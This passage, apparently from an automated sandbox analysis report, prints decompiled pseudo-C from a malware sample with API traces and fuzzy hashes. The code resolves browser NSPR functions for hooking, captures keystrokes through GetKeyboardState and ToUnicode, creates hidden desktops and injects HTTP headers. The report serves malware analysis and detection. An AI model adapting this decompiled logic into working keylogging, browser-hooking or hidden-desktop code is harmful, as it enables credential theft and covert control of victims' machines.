      • Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0041A81A
    • GetTickCount.KERNEL32 ref: 004103B5
    • GetKeyboardState.USER32(?), ref: 0041040D
    • ToUnicode.USER32 ref: 00410435
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: AddressProc$LibraryLoad$CriticalSection$CountEnterKeyboardLeaveMessageObjectSingleStateTickTranslateUnicodeWait
    • String ID:
    • API String ID: 2762424063-3916222277
    • Opcode ID: d561a10079d9d55a0bb8a1fe2f282126c7cc0b6f1e2f444e8a2a06ed3a110af2
    • Instruction ID: 5f1607d5043f637df0f7600997b5fdd72c13017be32289de030d1584882e31db
    • Opcode Fuzzy Hash: d561a10079d9d55a0bb8a1fe2f282126c7cc0b6f1e2f444e8a2a06ed3a110af2
    • Instruction Fuzzy Hash: 5031E8316043059BDB20AF64DD85AEB77A8EB44304F04483BFA50D7161D7B8D9C5CB9E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040F321(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				_Unknown_base(*)()* _t12;
    				struct HINSTANCE__* _t14;
    
    				 *0x422af8 =  *0x422af8 & 0x00000000;
    				 *0x422afc =  *0x422afc & 0x00000000;
    				_t14 = __eax;
    				InitializeCriticalSection(0x422adc);
    				 *0x422af4 = _a4;
    				 *0x422ad0 = _a8;
    				 *0x422b00 = _a12;
    				 *0x422ad4 = _t14;
    				 *0x422acc = _a16;
    				 *0x422ac8 = GetProcAddress(_t14, "PR_GetNameForIdentity");
    				 *0x422ad8 = GetProcAddress( *0x422ad4, "PR_SetError");
    				_t12 = GetProcAddress( *0x422ad4, "PR_GetError");
    				 *0x422ac4 = _t12;
    				return _t12;
    			}

    APIs
    • InitializeCriticalSection.KERNEL32(00422ADC,0001FD30,00404FAD,00422360), ref: 0040F337
    • GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040F373
    • GetProcAddress.KERNEL32(PR_SetError), ref: 0040F385
    • GetProcAddress.KERNEL32(PR_GetError), ref: 0040F397
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: AddressProc$CriticalInitializeSection
    • String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
    • API String ID: 2804437462-2578621715
    • Opcode ID: 550289f4f7917d93e03015e96d4a8ba38c92fca56fc84cfea84f9df1d5dd8299
    • Instruction ID: de04fd533e2a2eb6c8905065d537bb01b4dc4b3f5977b66f92c88e4a817f4fab
    • Opcode Fuzzy Hash: 550289f4f7917d93e03015e96d4a8ba38c92fca56fc84cfea84f9df1d5dd8299
    • Instruction Fuzzy Hash: 8B019D75A00315AFC734DF65EE48A063FE4FB48361B90487AE418E3A60D3F894829F98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E00418DFB(void* __edx, intOrPtr* _a4) {
    				char _v524;
    				char _v544;
    				char _v556;
    				intOrPtr _v572;
    				char _v924;
    				char _v1028;
    				char _v1040;
    				char _v1060;
    				intOrPtr _v1104;
    				intOrPtr _v1108;
    				intOrPtr _v1112;
    				intOrPtr _v1116;
    				char _v1120;
    				char* _v1124;
    				intOrPtr _v1128;
    				char _v1132;
    				intOrPtr _v1144;
    				signed short _v1146;
    				char _v1148;
    				signed int _v1152;
    				signed int _v1156;
    				char _v1157;
    				signed int _v1160;
    				void* _v1164;
    				void* _v1168;
    				char _v1177;
    				char _v1180;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t59;
    				void* _t62;
    				signed int _t71;
    				char _t77;
    				char* _t85;
    				char _t88;
    				char _t95;
    				short _t100;
    				intOrPtr* _t105;
    				void* _t111;
    				char _t112;
    				signed int _t118;
    				signed int _t119;
    				void* _t123;
    
    				_t111 = __edx;
    				_t105 = _a4;
    				_t59 =  *(_t105 + 4);
    				_push(_t118);
    				_t119 = _t118 | 0xffffffff;
    				_v1152 = _t119;
    				_v1156 = _t119;
    				if(_t59 == _t119 || _t59 == 0xfffffffe) {
    					L4:
    					_t62 = E0041237D( *((intOrPtr*)( *_t105 + 8)), _t108, 0);
    					_t109 =  *_t105;
    					_t63 = E00414D87(_t62,  *_t105,  *((intOrPtr*)( *_t105 + 4)));
    					_v1160 = _t63;
    					_t133 = _t63 - _t119;
    					if(_t63 == _t119) {
    						goto L20;
    					}
    					E004150F9(_t109, _t63);
    					E004150B7(_v1160);
    					_push(_t105 + 8);
    					_push(3);
    					_push(_v1164);
    					_t123 = 4;
    					if(E004183A6(_t109, _t123, _t133) == 0) {
    						goto L20;
    					}
    					_t71 =  *(_t105 + 4);
    					if(_t71 == 0xfffffffe) {
    						SetThreadPriority(GetCurrentThread(), 1);
    						E0041C9FB(0x2937498d,  &_v1028, 0);
    						_t63 = E004108EC(_t109, __eflags,  &_v1040);
    						__eflags = _t63;
    						if(_t63 == 0) {
    							goto L20;
    						}
    						_t77 = E0040B81B(_t109, _t111,  &_v924, 1);
    						__eflags = _t77;
    						if(_t77 == 0) {
    							L19:
    							_t63 = E0040BA86( &_v924, 1);
    							goto L20;
    						} else {
    							__imp__GetShellWindow();
    							__eflags = _t77;
    							_v1157 = _t77 != 0;
    							__eflags = _v1157;
    							if(_v1157 == 0) {
    								E00419897(0xa8,  &_v1132);
    								_t85 =  &_v524;
    								__imp__SHGetFolderPathW(0, 0x25, 0, 0, _t85);
    								__eflags = _t85;
    								if(_t85 == 0) {
    									_t88 = E00417593( &_v1132,  &_v544,  &_v544);
    									__eflags = _t88;
    									if(_t88 != 0) {
    										_t112 = 0x44;
    										E00411DB1( &_v1120,  &_v1120, 0, _t112);
    										_v1124 =  &_v1060;
    										_v1132 = _t112;
    										_t95 = E004135C5( &_v556, 0, 0,  &_v1132,  &_v1180);
    										__eflags = _t95;
    										if(_t95 != 0) {
    											WaitForSingleObject(_v1168, 0x1388);
    											CloseHandle(_v1164);
    											CloseHandle(_v1168);
    											_v1177 = 1;
    										}
    									}
    								}
    							}
    							SystemParametersInfoW(0x1003, 0, 0, 0);
    							__eflags = _v1157 - 1;
    							if(__eflags == 0) {
    								_v1132 =  &_v924;
    								_v1128 = 0x40bc90;
    								_v1124 = 0x40bc93;
    								_v1120 = E0040BC96;
    								_v1116 = E0040BCBA;
    								_v1112 = E0040BD01;
    								_v1108 = E0040BD36;
    								_v1104 = 0x40bc90;
    								E0040D6D4(__eflags, _v1156,  &_v1132, _v924, _v572);
    							}
    							goto L19;
    						}
    					} else {
    						if(_t71 == 0xffffffff) {
    							_t63 = E004063A9(_v1156, _t109);
    						} else {
    							_push(_v1152);
    							_t63 = E00414EFA(_v1156);
    							_t105 = _a4;
    						}
    						goto L20;
    					}
    				} else {
    					_t100 = 2;
    					_v1148 = _t100;
    					_t108 =  *(_t105 + 4) << 8;
    					_v1146 =  *(_t105 + 5) & 0x000000ff |  *(_t105 + 4) << 0x00000008;
    					_v1144 = 0x100007f;
    					_t63 = E00414D46( &_v1148);
    					_v1152 = _t63;
    					if(_t63 == _t119) {
    						L20:
    						E004150A1(E004150A1(_t63, _v1156), _v1152);
    						E00411CFE(_t105);
    						return 0;
    					} else {
    						E004150F9(_t108, _t63);
    						goto L4;
    					}
    				}
    			}

    APIs
      • Part of subcall function 00414D46: #23.WS2_32(?,00000001,00000006,?,0040634A,?,00000000,00000010,?,00000000,?,00000000,?,00000001,?,00000000), ref: 00414D4F
      • Part of subcall function 00414D46: #4.WS2_32(00000000,?,-0000001D), ref: 00414D6F
      • Part of subcall function 00414D46: #3.WS2_32(00000000), ref: 00414D7A
      • Part of subcall function 004150F9: #21.WS2_32(?,00000006,00000001,?,00000004,?,?,0040530A,00000000), ref: 0041510F
    • GetCurrentThread.KERNEL32 ref: 00418EE0
    • SetThreadPriority.KERNEL32(00000000), ref: 00418EE7
      • Part of subcall function 004108EC: OpenWindowStationW.USER32(?,00000000,10000000), ref: 00410911
      • Part of subcall function 004108EC: CreateWindowStationW.USER32 ref: 00410924
      • Part of subcall function 004108EC: GetProcessWindowStation.USER32 ref: 00410935
      • Part of subcall function 004108EC: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 00410970
      • Part of subcall function 004108EC: CreateDesktopW.USER32 ref: 00410984
      • Part of subcall function 004108EC: GetCurrentThreadId.KERNEL32 ref: 00410990
      • Part of subcall function 004108EC: GetThreadDesktop.USER32(00000000), ref: 00410997
      • Part of subcall function 004108EC: SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 004109A9
      • Part of subcall function 004108EC: CloseDesktop.USER32(00000000,00000000,00000000), ref: 004109BB
      • Part of subcall function 004108EC: CloseWindowStation.USER32(?,?), ref: 004109D6
      • Part of subcall function 0040B81B: TlsAlloc.KERNEL32(00422918,00000000,0000018C,00000000,00000000), ref: 0040B834
    • GetShellWindow.USER32 ref: 00418F2D
    • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?), ref: 00418F60
      • Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2
    • WaitForSingleObject.KERNEL32(00000000,00001388,?,00000000,00000000,?,00000044,?,00000000,00000044,?,?), ref: 00418FC2
    • CloseHandle.KERNEL32(?), ref: 00418FD2
    • CloseHandle.KERNEL32(?), ref: 00418FD8
    • SystemParametersInfoW.USER32 ref: 00418FE7
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: DesktopThreadWindow$CloseStation$CreateCurrentHandleOpenPath$AllocCombineFolderInfoObjectParametersPriorityProcessShellSingleSystemWait
    • String ID:
    • API String ID: 2295704857-0
    • Opcode ID: 0e8c90a275b7062a3dbd84e506d1c7e79d791c6bcceda2c9040e92c26671535b
    • Instruction ID: c682e1bb6c1ac47b12d33020679d924b71445d6bca498164bd42e4eae6f0d342
    • Opcode Fuzzy Hash: 0e8c90a275b7062a3dbd84e506d1c7e79d791c6bcceda2c9040e92c26671535b
    • Instruction Fuzzy Hash: AF61A2710083419FD720EF65C884EDFBBE8EFC5704F00492EF594A61A1DB7898858BAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040E95B(void* __ecx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
    				signed char* _v20;
    				void* _v24;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				void* _v48;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				char _v76;
    				void* _v80;
    				void* _v108;
    				signed int _v120;
    				signed int _v124;
    				char _v128;
    				void* _v129;
    				void* _v132;
    				void* _v140;
    				signed int _v176;
    				void* _v177;
    				intOrPtr _v180;
    				void* _v184;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed char _t85;
    				signed int _t88;
    				intOrPtr _t89;
    				void* _t92;
    				void* _t96;
    				void* _t100;
    				signed int _t107;
    				intOrPtr _t108;
    				intOrPtr _t111;
    				intOrPtr _t113;
    				intOrPtr _t114;
    				intOrPtr _t115;
    				intOrPtr _t116;
    				intOrPtr _t117;
    				intOrPtr _t118;
    				signed char* _t119;
    				signed int _t120;
    				struct _CRITICAL_SECTION* _t126;
    				intOrPtr _t131;
    				char* _t138;
    				char* _t139;
    				char* _t140;
    				signed int _t142;
    				signed int _t148;
    				signed int _t151;
    				void* _t153;
    
    				_t153 = (_t151 & 0xfffffff8) - 0x7c;
    				_v120 = _v120 | 0xffffffff;
    				_t122 =  &_v76;
    				if(E0040E840( &_v76, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
    					L23:
    					E0041BED2( &_v76);
    					return _v120;
    				}
    				_t85 = E0041B5A4(_t122);
    				_v120 = _t85;
    				if((1 & _t85) == 0) {
    					__eflags = _t85 & 0x00000002;
    					if((_t85 & 0x00000002) == 0) {
    						_t126 = 0x422aa4;
    						L18:
    						__eflags =  *(_t153 + 0x18) & 0x00000004;
    						if(( *(_t153 + 0x18) & 0x00000004) == 0) {
    							goto L23;
    						}
    						 *_a8 = _v40;
    						 *_a12 =  *((intOrPtr*)(_t153 + 0x68));
    						EnterCriticalSection(_t126);
    						_t146 = _a4;
    						_t88 = E0040DEC2(_a4);
    						__eflags = _t88 - 0xffffffff;
    						if(_t88 != 0xffffffff) {
    							L21:
    							_t89 =  *0x422abc; // 0x0
    							_t148 = _t88 * 0x24;
    							__eflags = _t148;
    							E00411CFE( *((intOrPtr*)(_t148 + _t89 + 8)));
    							_t131 =  *0x422abc; // 0x0
    							 *((intOrPtr*)(_t148 + _t131 + 8)) = _v44;
    							L22:
    							LeaveCriticalSection(_t126);
    							goto L23;
    						}
    						_t88 = E0040DEE8(_t88, _t146);
    						__eflags = _t88 - 0xffffffff;
    						if(_t88 == 0xffffffff) {
    							goto L22;
    						}
    						goto L21;
    					}
    					_v124 = _v124 & 0x00000000;
    					 *(_t153 + 0xf) = 1;
    					__eflags =  *((intOrPtr*)(_t153 + 0x7c)) - 1;
    					if( *((intOrPtr*)(_t153 + 0x7c)) != 1) {
    						L9:
    						_t138 = _t153 + 0x28;
    						_t92 = 0x21;
    						E00419861(_t92, _t138);
    						HttpAddRequestHeadersA(_a4, _t138, 0xffffffff, 0xa0000000);
    						_t139 =  &_v128;
    						_t96 = 0x22;
    						E00419861(_t96, _t139);
    						HttpAddRequestHeadersA(_a4, _t139, 0xffffffff, 0x80000000);
    						_t140 = _t153 + 0x28;
    						_t100 = 0x23;
    						E00419861(_t100, _t140);
    						HttpAddRequestHeadersA(_a4, _t140, 0xffffffff, 0x80000000);
    						L10:
    						_t126 = 0x422aa4;
    						EnterCriticalSection(0x422aa4);
    						__eflags =  *(_t153 + 0xf);
    						if( *(_t153 + 0xf) == 0) {
    							L14:
    							E0041BF3C( *((intOrPtr*)(_t153 + 0x80)), _v68);
    							__eflags = _v176;
    							if(_v176 != 0) {
    								E0041398B( *((intOrPtr*)(_t153 + 0x10)));
    							}
    							L16:
    							LeaveCriticalSection(_t126);
    							goto L18;
    						}
    						_t150 = _a4;
    						_t107 = E0040DEC2(_a4);
    						__eflags = _t107 - 0xffffffff;
    						if(_t107 != 0xffffffff) {
    							L13:
    							_t108 =  *0x422abc; // 0x0
    							_t142 = _t107 * 0x24;
    							E0041BF3C( *((intOrPtr*)(_t108 + _t142 + 0x10)),  *((intOrPtr*)(_t108 + _t142 + 0xc)));
    							_t111 =  *0x422abc; // 0x0
    							E00411CFE( *((intOrPtr*)(_t142 + _t111 + 0x14)));
    							_t113 =  *0x422abc; // 0x0
    							 *(_t142 + _t113 + 0x14) =  *(_t142 + _t113 + 0x14) & 0x00000000;
    							_t114 =  *0x422abc; // 0x0
    							 *(_t142 + _t114 + 0x1c) =  *(_t142 + _t114 + 0x1c) & 0x00000000;
    							_t115 =  *0x422abc; // 0x0
    							 *(_t142 + _t115 + 0x18) =  *(_t142 + _t115 + 0x18) | 0xffffffff;
    							_t116 =  *0x422abc; // 0x0
    							 *((intOrPtr*)(_t142 + _t116 + 0xc)) = _v76;
    							_t117 =  *0x422abc; // 0x0
    							 *((intOrPtr*)(_t142 + _t117 + 0x10)) = _v72;
    							_t118 =  *0x422abc; // 0x0
    							 *((intOrPtr*)(_t142 + _t118 + 0x20)) = _v180;
    							goto L16;
    						}
    						_t107 = E0040DEE8(_t107, _t150);
    						__eflags = _t107 - 0xffffffff;
    						if(_t107 == 0xffffffff) {
    							goto L14;
    						}
    						goto L13;
    					}
    					_t119 = _v20;
    					__eflags =  *_t119 & 0x00000003;
    					if(( *_t119 & 0x00000003) == 0) {
    						goto L9;
    					}
    					_t120 = E0041C176(_t119,  &_v76);
    					_v124 = _t120;
    					__eflags = _t120;
    					if(_t120 != 0) {
    						_v120 = 1;
    					} else {
    						 *(_t153 + 0xf) = _t120;
    					}
    					goto L10;
    				} else {
    					SetLastError(0x2f78);
    					_v120 = _v120 & 0x00000000;
    					goto L23;
    				}
    			}

    APIs
      • Part of subcall function 0041B5A4: EnterCriticalSection.KERNEL32(00423A34,?,?,?), ref: 0041B5BF
      • Part of subcall function 0041B5A4: LeaveCriticalSection.KERNEL32(00423A34,?,?,?), ref: 0041B642
    • SetLastError.KERNEL32(00002F78,?), ref: 0040E9A2
    • EnterCriticalSection.KERNEL32(00422AA4), ref: 0040EA49
    • LeaveCriticalSection.KERNEL32(00422AA4,?), ref: 0040EAFF
    • EnterCriticalSection.KERNEL32(00422AA4,?), ref: 0040EB26
    • LeaveCriticalSection.KERNEL32(00422AA4,?), ref: 0040EB66
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeave$ErrorLast
    • String ID:
    • API String ID: 486337731-0
    • Opcode ID: d46dedabc5f4f72c2142b66cd3335a5eb60b5821c7afa2423a1c624167a7e9c2
    • Instruction ID: d9c854e1b37765dcbf5963ad8dde29cf733aa981f1e2d688d829bd8f3d802894
    • Opcode Fuzzy Hash: d46dedabc5f4f72c2142b66cd3335a5eb60b5821c7afa2423a1c624167a7e9c2
    • Instruction Fuzzy Hash: A0518F31604301AFC721DF29C885A5ABBA5FF44328F144A2EF961AB2F1C774DD56CB89
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E004051A1(void* __ecx, void* __eflags) {
    				intOrPtr _v74;
    				signed int _v78;
    				char _v124;
    				char _v128;
    				intOrPtr _v140;
    				void* _v144;
    				intOrPtr _v148;
    				void* _v152;
    				void* _v156;
    				void* _v160;
    				char _v164;
    				void* _v168;
    				signed int _v172;
    				long _v184;
    				void* __esi;
    				void* _t47;
    				void* _t49;
    				void* _t56;
    				void* _t57;
    				long _t59;
    				intOrPtr _t64;
    				long _t65;
    				void* _t72;
    				signed int _t83;
    				intOrPtr* _t85;
    				signed int _t94;
    				long _t97;
    				signed int _t98;
    				void* _t100;
    
    				_t100 = (_t98 & 0xfffffff8) - 0xac;
    				_t83 = 2;
    				_t47 = E0041CA33(__ecx, 0x743c152e, _t83);
    				_v156 = _t47;
    				if(_t47 != 0) {
    					if(E0041CB59() == 0) {
    						L26:
    						E004154D1(_v148);
    						_t49 = 0;
    						L27:
    						return _t49;
    					}
    					E0040B22C(__ecx,  &_v124);
    					_t87 = _v78;
    					_t94 = E0040504C( &_v160, _v78,  &_v168) & 0x0000ffff;
    					if(_t94 != 0) {
    						L7:
    						if(_t94 != _v74) {
    							E0040B2E7( &_v124);
    							_v78 = _t94;
    							E0040B33F( &_v128);
    						}
    						_v144 =  *0x424024;
    						_t56 = _v152;
    						_v172 = 1;
    						if(_t56 != 0) {
    							_v140 = _t56;
    							_v172 = _t83;
    						}
    						_t57 = _v160;
    						if(_t57 != 0) {
    							_t87 = _v172;
    							_v172 = _v172 + 1;
    							 *((intOrPtr*)(_t100 + 0x2c + _v172 * 4)) = _t57;
    						}
    						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
    						if(_t59 <= 0) {
    							L25:
    							E004150A1(_t59, _v156);
    							E004150A1(CloseHandle(_v152), _v164);
    							CloseHandle(_v160);
    							goto L26;
    						} else {
    							_t85 = __imp__#1;
    							while(_t59 < _v172) {
    								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
    								if(_t64 != _v152) {
    									if(_t64 != _v160) {
    										while(1) {
    											L23:
    											_t65 =  *_t85(_v168, 0, 0);
    											_t97 = _t65;
    											if(_t97 == 0xffffffff) {
    												break;
    											}
    											__imp__WSAEventSelect(_t97, 0, 0);
    											_v156 = 0;
    											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
    											E004150F9(_t87, _t97);
    											if(E00413733(0x20000, E004050D4, _t97) == 0) {
    												E004150A1(_t69, _t97);
    											}
    										}
    										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
    										if(_t59 > 0) {
    											continue;
    										}
    										goto L25;
    									}
    									_t72 = _v164;
    									L20:
    									_v168 = _t72;
    									goto L23;
    								}
    								_t72 = _v156;
    								goto L20;
    							}
    							goto L25;
    						}
    					}
    					while(WaitForSingleObject( *0x424024, 0x3e8) == 0x102) {
    						_t87 = _v74;
    						_t94 = E0040504C( &_v156, _v74,  &_v164) & 0x0000ffff;
    						if(_t94 == 0) {
    							continue;
    						}
    						break;
    					}
    					if(_t94 == 0) {
    						goto L26;
    					}
    					goto L7;
    				}
    				_t49 = 1;
    				goto L27;
    			}

    APIs
      • Part of subcall function 0041CA33: CreateMutexW.KERNEL32(00423B98,00000000,?,?,?,?,?), ref: 0041CA54
    • WaitForSingleObject.KERNEL32(000003E8,?,?,743C152E,00000002), ref: 0040520C
    • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,743C152E), ref: 0040529D
    • #1.WS2_32(?,00000000,00000000), ref: 00405329
    • WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 0040533D
    • CloseHandle.KERNEL32(?), ref: 0040535E
    • CloseHandle.KERNEL32(?), ref: 0040536D
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingle
    • String ID:
    • API String ID: 2824434197-0
    • Opcode ID: bce90c30cdb100cdad9420987a6e34dc2aa7ecc3220726be04f6cb3f87ca7aea
    • Instruction ID: b1b6b72dbccb16d205e8212464e50ac053542ec670d1af532527122d8273def4
    • Opcode Fuzzy Hash: bce90c30cdb100cdad9420987a6e34dc2aa7ecc3220726be04f6cb3f87ca7aea
    • Instruction Fuzzy Hash: BD517B71508A01AFC720EB65DC84CAFB7E8EBC8744F60092EF591E22A0D7389D458F5A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00419C89(int __eax, long __ecx, void* __edx) {
    				struct HWND__* _v8;
    				signed short _v12;
    				int _v16;
    				long _v20;
    				struct tagPOINT _v28;
    				intOrPtr _t46;
    				int _t50;
    				signed int _t51;
    				signed int _t52;
    				signed int _t63;
    				signed int _t64;
    				signed int _t67;
    				signed int _t69;
    				signed int _t70;
    				signed int _t71;
    				int _t73;
    				void* _t74;
    				long _t78;
    				void* _t79;
    				void* _t80;
    				intOrPtr _t81;
    
    				_t80 = __edx;
    				_t73 = __eax;
    				_t78 = __ecx;
    				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
    				_t46 =  *((intOrPtr*)(_t80 + 0x10));
    				_v8 =  *((intOrPtr*)(_t46 + 0x108));
    				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
    				ReleaseMutex( *(_t80 + 0x14));
    				_t50 = GetWindowRect(_v8,  &_v28);
    				if(_t50 != 0) {
    					if(_v12 != 2) {
    						_t51 = _v12 & 0x0000ffff;
    						__eflags = _t51 - 0xd;
    						if(__eflags > 0) {
    							_t52 = _t51 - 0xe;
    							__eflags = _t52;
    							if(_t52 == 0) {
    								_v20 = _t78;
    								goto L22;
    							} else {
    								_t63 = _t52 - 1;
    								__eflags = _t63;
    								if(_t63 == 0) {
    									_v16 = _t73;
    								} else {
    									_t64 = _t63 - 1;
    									__eflags = _t64;
    									if(_t64 == 0) {
    										_v16 = _t73;
    										goto L19;
    									} else {
    										__eflags = _t64 == 1;
    										if(_t64 == 1) {
    											goto L16;
    										}
    									}
    								}
    							}
    						} else {
    							if(__eflags == 0) {
    								L11:
    								_v28.x = _t78;
    								goto L22;
    							} else {
    								_t67 = _t51;
    								__eflags = _t67;
    								if(_t67 == 0) {
    									goto L11;
    								} else {
    									_t69 = _t67;
    									__eflags = _t69;
    									if(_t69 == 0) {
    										L16:
    										_v16 = _t73;
    										goto L17;
    									} else {
    										_t70 = _t69 - 6;
    										__eflags = _t70;
    										if(_t70 == 0) {
    											L19:
    											_v28.x = _t78;
    										} else {
    											_t71 = _t70 - 1;
    											__eflags = _t71;
    											if(_t71 == 0) {
    												L17:
    												_v20 = _t78;
    											} else {
    												__eflags = _t71 == 1;
    												if(_t71 == 1) {
    													L22:
    													_v28.y = _t73;
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					} else {
    						_t81 =  *((intOrPtr*)(_t80 + 0x10));
    						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
    						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
    						_v28.x = _v28.x + _t79;
    						_v28.y = _v28.y + _t74;
    						_v20 = _v20 + _t79;
    						_v16 = _v16 + _t74;
    					}
    					_t50 = IsRectEmpty( &_v28);
    					if(_t50 == 0) {
    						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
    							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
    						}
    						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
    					}
    				}
    				return _t50;
    			}
    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00419C9D
    • ReleaseMutex.KERNEL32(?), ref: 00419CBC
    • GetWindowRect.USER32 ref: 00419CC9
    • IsRectEmpty.USER32 ref: 00419D4D
    • GetWindowLongW.USER32(?,000000F0), ref: 00419D5C
    • GetParent.USER32(?), ref: 00419D72
    • MapWindowPoints.USER32 ref: 00419D7B
    • SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 00419D9F
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
    • String ID:
    • API String ID: 2634726239-0
    • Opcode ID: 74d79d5d255c72d56ea8efc558eb35c3b8a67add84ad0edb3f99780bece9d78a
    • Instruction ID: cb5d7c41d36cdf1ee14a90c2e80689a5c8d78c459ccd8f410a7c3d53a9fb4bcc
    • Opcode Fuzzy Hash: 74d79d5d255c72d56ea8efc558eb35c3b8a67add84ad0edb3f99780bece9d78a
    • Instruction Fuzzy Hash: F4416D71D0020AEFDB108FDAEA59AFEBBB4FB04750F10056AE511E6660D7789E80DB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00419C89(int __eax, long __ecx, void* __edx) {
    				struct HWND__* _v8;
    				signed short _v12;
    				int _v16;
    				long _v20;
    				struct tagPOINT _v28;
    				intOrPtr _t46;
    				int _t50;
    				signed int _t51;
    				signed int _t52;
    				signed int _t63;
    				signed int _t64;
    				signed int _t67;
    				signed int _t69;
    				signed int _t70;
    				signed int _t71;
    				int _t73;
    				void* _t74;
    				long _t78;
    				void* _t79;
    				void* _t80;
    				intOrPtr _t81;
    
    				_t80 = __edx;
    				_t73 = __eax;
    				_t78 = __ecx;
    				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
    				_t46 =  *((intOrPtr*)(_t80 + 0x10));
    				_v8 =  *((intOrPtr*)(_t46 + 0x108));
    				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
    				ReleaseMutex( *(_t80 + 0x14));
    				_t50 = GetWindowRect(_v8,  &_v28);
    				if(_t50 != 0) {
    					if(_v12 != 2) {
    						_t51 = _v12 & 0x0000ffff;
    						__eflags = _t51 - 0xd;
    						if(__eflags > 0) {
    							_t52 = _t51 - 0xe;
    							__eflags = _t52;
    							if(_t52 == 0) {
    								_v20 = _t78;
    								goto L22;
    							} else {
    								_t63 = _t52 - 1;
    								__eflags = _t63;
    								if(_t63 == 0) {
    									_v16 = _t73;
    								} else {
    									_t64 = _t63 - 1;
    									__eflags = _t64;
    									if(_t64 == 0) {
    										_v16 = _t73;
    										goto L19;
    									} else {
    										__eflags = _t64 == 1;
    										if(_t64 == 1) {
    											goto L16;
    										}
    									}
    								}
    							}
    						} else {
    							if(__eflags == 0) {
    								L11:
    								_v28.x = _t78;
    								goto L22;
    							} else {
    								_t67 = _t51;
    								__eflags = _t67;
    								if(_t67 == 0) {
    									goto L11;
    								} else {
    									_t69 = _t67;
    									__eflags = _t69;
    									if(_t69 == 0) {
    										L16:
    										_v16 = _t73;
    										goto L17;
    									} else {
    										_t70 = _t69 - 6;
    										__eflags = _t70;
    										if(_t70 == 0) {
    											L19:
    											_v28.x = _t78;
    										} else {
    											_t71 = _t70 - 1;
    											__eflags = _t71;
    											if(_t71 == 0) {
    												L17:
    												_v20 = _t78;
    											} else {
    												__eflags = _t71 == 1;
    												if(_t71 == 1) {
    													L22:
    													_v28.y = _t73;
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					} else {
    						_t81 =  *((intOrPtr*)(_t80 + 0x10));
    						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
    						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
    						_v28.x = _v28.x + _t79;
    						_v28.y = _v28.y + _t74;
    						_v20 = _v20 + _t79;
    						_v16 = _v16 + _t74;
    					}
    					_t50 = IsRectEmpty( &_v28);
    					if(_t50 == 0) {
    						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
